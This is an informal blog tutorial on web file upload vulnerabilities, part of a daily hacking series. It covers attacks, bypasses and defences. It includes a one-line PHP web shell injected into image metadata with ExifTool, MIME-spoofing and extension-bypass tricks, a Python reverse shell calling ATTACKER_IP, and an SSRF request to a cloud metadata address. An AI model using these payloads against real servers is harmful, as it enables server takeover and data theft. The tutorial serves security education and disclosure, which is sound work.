Hey guys, Rocky here! š±š»
Welcome to Day 7 of the Daily Web Hacking series! So far, weāve dissected XSS, CSRF, and Burp Suite. Today, weāre diving into Part 7: File Upload Vulnerabilitiesāthe hack that turns harmless files like cat.jpg into malicious shell.php. Imagine a Trojan horse disguised as a cute kitten GIF. Letās break it down!
ā
What Are File Upload Vulnerabilities?
File upload vulnerabilities occur when a web app allows users to upload files without proper validation. Attackers exploit this to:
- Upload web shells (malicious scripts).
- Execute commands on the server.
- Steal data, deface sites, or pivot to internal networks.
Why itās dangerous:
- Ranked #9 in the OWASP Top 10 (2021).
- 52% of web apps have insecure file uploads (Acunetix, 2023).
- A single malicious file can lead to full server takeover.
ā
How File Upload Attacks Work
Letās say a site lets users upload profile pictures. If it doesnāt validate files properly:
- Attacker uploads
shell.php disguised as cat.jpg.
- Server saves it to a public directory like
/uploads.
- Attacker visits
https://site.com/uploads/shell.php.
- Server executes the PHP code, granting the attacker control.
Key Insight: The serverās trust in uploaded files is the vulnerability.
ā
Types of File Upload Attacks
1. Web Shell Upload
2. Malicious File Execution
- How: Upload files with double extensions (e.g.,
cat.jpg.php).
- Bypass Technique: If the app checks only the first extension.
3. Overwriting Critical Files
4. Polyglot Files
What: Files that are valid as multiple types (e.g., a JPEG thatās also PHP).
Create with ExifTool:
exiftool -Comment='<?php system($_GET["cmd"]); ?>' cat.jpg -o polyglot.php.jpg
ā
Real-World Disasters
- Facebook (2012): Malicious JPEGs could execute PHP code.
- ImageMagick (2016):
CVE-2016-3714 let attackers upload SVG files to run shell commands.
- Drupal (2018): File module flaw allowed PHP uploads.
Lesson: Even giants fall.
ā
Step-by-Step Exploitation
Goal: Upload a web shell to a vulnerable site.
1. Find the Upload Form
- Profile pictures, document uploads, support tickets.
2. Test for Validation Bypass
Trick 1: Rename shell.php to shell.php.jpg.
Trick 2: Use Burp to tamper with the Content-Type header:
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpeg # Spoof MIME type
3. Upload the File
- If the server responds with a path like
/uploads/shell.php, youāve won.
4. Execute Commands
- Visit
https://site.com/uploads/shell.php?cmd=id to see the serverās user.
ā
Bypassing File Upload Defenses
1. Client-Side Validation
- Bypass: Disable JavaScript or use Burp to intercept/modify the request.
2. Blacklist Filters
- Bypass: Use rare extensions (
.phtml, .phar, .htaccess).
3. File Type Detection
- Bypass: Spoof MIME types or magic bytes (e.g.,
GIF89a; <?php ... ?>).
4. Image Resizing
- Bypass: Embed PHP code in image metadata (e.g., EXIF comments).
ā
Defending Against File Upload Attacks
For Developers
Use Allowlists, Not Blocklists
Allow only specific extensions (e.g., .jpg, .png).
PHP Example:
$allowed = ['jpg', 'png', 'pdf'];
$ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
if (!in_array($ext, $allowed)) { die("Invalid file!"); }
Validate Content, Not Just Headers
Rename Uploaded Files
Store Files Outside the Web Root
Set Proper Permissions
Scan Files with Antivirus
For Server Admins
Disable Execution in Uploads Directory
Limit File Size
Use a Web Application Firewall (WAF)
ā
Tools for Testing File Uploads
1. Burp Suite
- Intercept/modify upload requests.
- Test for MIME spoofing and parameter tampering.
2. Web Shells
PHP: PentestMonkey Reverse Shell.
Python:
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("ATTACKER_IP",4444))
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])
3. ExifTool
- Inject PHP code into image metadata.
4. Metasploit
ā
Real-World Attack Walkthrough
Objective: Upload a PHP shell to a vulnerable blogging platform.
1. Recon
- Find the avatar upload feature at
/profile/upload.
2. Bypass Client-Side Validation
- Rename
shell.php to shell.jpg and intercept with Burp.
- Change filename to
shell.php and MIME type to image/jpeg.
3. Upload & Execute
4. Escalate Access
ā
Ethical Hacking & Reporting
Never exploit file upload flaws without permission. If you find one:
- Document: Record steps to reproduce.
- Report: Use the siteās security contact or bug bounty program.
- Disclose: Wait for a fix before sharing publicly.
ā
Whatās Next? Part 8: Server-Side Request Forgery (SSRF)
Tomorrow, weāll explore SSRFātricking servers into fetching internal resources. Sneak peek:
GET /proxy?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1
ā
Final Thoughts
File upload vulnerabilities are a hackerās golden ticket. Theyāre easy to exploit but devastating to defend against. By combining strict validation, server hardening, and constant vigilance, you can turn this attack vector into a fortress.
Remember: The webās security is a team effort. Find flaws, report them, and make the internet saferāone upload at a time.
Rocky out! āļø
ā
P.S. If youāre loving this series, share it with your hacking squad! Letās turn script kiddies into security heroes.
Discussion Question: Whatās the wildest file upload bypass youāve seen? I once saw a .php.gif file that executed code and displayed a dancing banana. šš„ Drop your stories below! š
